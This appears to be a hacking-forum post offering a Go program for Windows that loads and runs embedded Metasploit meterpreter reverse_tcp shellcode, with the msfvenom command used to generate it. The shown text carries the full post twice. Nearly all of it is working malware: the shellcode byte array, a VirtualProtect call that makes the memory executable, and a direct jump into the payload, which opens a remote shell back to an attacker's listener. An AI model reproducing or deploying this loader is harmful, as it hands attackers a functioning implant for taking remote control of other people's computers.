
golang shellcode loader (winApi)

stars4

hello, this is my basic shellcode loader written in golang
to generate the shellcode with msfvenom, use this command --> msfvenom -p windows/meterpreter/reverse_tcp LHOST=LISTENER_IP LPORT=LISTENER_PORT -f go

Код:
package main

import (
    "fmt"
    "unsafe"
    "syscall"
)

// Both handles are resolved once at package initialisation. The Must* helpers
// panic if the DLL cannot be loaded or the export cannot be found.
var  (
      // kernel32 is the loaded kernel32.dll module handle.
      kernel32       = syscall.MustLoadDLL("kernel32.dll")
      // VirtualProtect is kernel32's VirtualProtect export; main uses it to
      // change the page protection of an in-process buffer.
      VirtualProtect = kernel32.MustFindProc("VirtualProtect")
)

// main changes the protection of the memory backing an embedded byte slice to
// executable and then transfers control to the first byte of that slice.
//
// Behaviour visible to a defender: a kernel32!VirtualProtect call that adds
// execute permission to private (non-image-backed) memory inside the process,
// followed by execution starting from that same region.
func main() {
     // Passed to VirtualProtect as lpflOldProtect, the out-parameter that
     // receives the previous protection value.
     // NOTE(review): declared as a Go string, so the API writes through a
     // pointer to the string variable's storage.
     old         := ""

     // Machine code embedded as a byte literal. Per the accompanying post it
     // is msfvenom output for windows/meterpreter/reverse_tcp in "-f go" format.
     shellcode :=  []byte{0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,
     0x89,0xe5,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,
     0x31,0xff,0x0f,0xb7,0x4a,0x26,0x8b,0x72,0x28,0x31,0xc0,0xac,
     0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,
     0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,
     0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x01,0xd0,0x8b,0x48,0x18,
     0x8b,0x58,0x20,0x50,0x01,0xd3,0x85,0xc9,0x74,0x3c,0x49,0x8b,
     0x34,0x8b,0x31,0xff,0x01,0xd6,0x31,0xc0,0xac,0xc1,0xcf,0x0d,
     0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,
     0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,
     0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,
     0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,
     0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,0x68,0x33,0x32,
     0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,
     0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,
     0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,
     0x0a,0x00,0x02,0x02,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,
     0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,
     0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
     0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,
     0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,
     0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,
     0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,
     0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
     0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,
     0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,
     0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,
     0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,
     0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,
     0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5};
     // 0x40 is PAGE_EXECUTE_READWRITE, applied in place to the region that
     // starts at the slice's first element and spans len(shellcode) bytes.
     // The call's first return value (the API's success flag) is discarded;
     // e is built from GetLastError and is non-nil even when the call succeeds,
     // so the printed text alone does not show whether the change took effect.
     _,_,e := VirtualProtect.Call(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), uintptr(0x40), uintptr(unsafe.Pointer(&old)))
     fmt.Println(e)

     // Treats the address of the slice's first byte as a function and calls it
     // with an argument count of zero; control passes to the embedded bytes.
     syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(0), uintptr(0), uintptr(0), uintptr(0))
}
 
hello, this is my basic shellcode loader written in golang
to generate the shellcode with msfvenom, use this command --> msfvenom -p windows/meterpreter/reverse_tcp LHOST=LISTENER_IP LPORT=LISTENER_PORT -f go

Код:
package main

import (
    "fmt"
    "unsafe"
    "syscall"
)

// Both handles are resolved once at package initialisation. The Must* helpers
// panic if the DLL cannot be loaded or the export cannot be found.
var  (
      // kernel32 is the loaded kernel32.dll module handle.
      kernel32       = syscall.MustLoadDLL("kernel32.dll")
      // VirtualProtect is kernel32's VirtualProtect export; main uses it to
      // change the page protection of an in-process buffer.
      VirtualProtect = kernel32.MustFindProc("VirtualProtect")
)

// main changes the protection of the memory backing an embedded byte slice to
// executable and then transfers control to the first byte of that slice.
//
// Behaviour visible to a defender: a kernel32!VirtualProtect call that adds
// execute permission to private (non-image-backed) memory inside the process,
// followed by execution starting from that same region.
func main() {
     // Passed to VirtualProtect as lpflOldProtect, the out-parameter that
     // receives the previous protection value.
     // NOTE(review): declared as a Go string, so the API writes through a
     // pointer to the string variable's storage.
     old         := ""

     // Machine code embedded as a byte literal. Per the accompanying post it
     // is msfvenom output for windows/meterpreter/reverse_tcp in "-f go" format.
     shellcode :=  []byte{0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,
     0x89,0xe5,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,
     0x31,0xff,0x0f,0xb7,0x4a,0x26,0x8b,0x72,0x28,0x31,0xc0,0xac,
     0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,
     0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,
     0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x01,0xd0,0x8b,0x48,0x18,
     0x8b,0x58,0x20,0x50,0x01,0xd3,0x85,0xc9,0x74,0x3c,0x49,0x8b,
     0x34,0x8b,0x31,0xff,0x01,0xd6,0x31,0xc0,0xac,0xc1,0xcf,0x0d,
     0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,
     0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,
     0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,
     0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,
     0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,0x68,0x33,0x32,
     0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,
     0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,
     0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,
     0x0a,0x00,0x02,0x02,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,
     0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,
     0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
     0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,
     0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,
     0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,
     0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,
     0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
     0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,
     0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,
     0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,
     0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,
     0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,
     0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5};
     // 0x40 is PAGE_EXECUTE_READWRITE, applied in place to the region that
     // starts at the slice's first element and spans len(shellcode) bytes.
     // The call's first return value (the API's success flag) is discarded;
     // e is built from GetLastError and is non-nil even when the call succeeds,
     // so the printed text alone does not show whether the change took effect.
     _,_,e := VirtualProtect.Call(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), uintptr(0x40), uintptr(unsafe.Pointer(&old)))
     fmt.Println(e)

     // Treats the address of the slice's first byte as a function and calls it
     // with an argument count of zero; control passes to the embedded bytes.
     syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(0), uintptr(0), uintptr(0), uintptr(0))
}
loader
injector
 

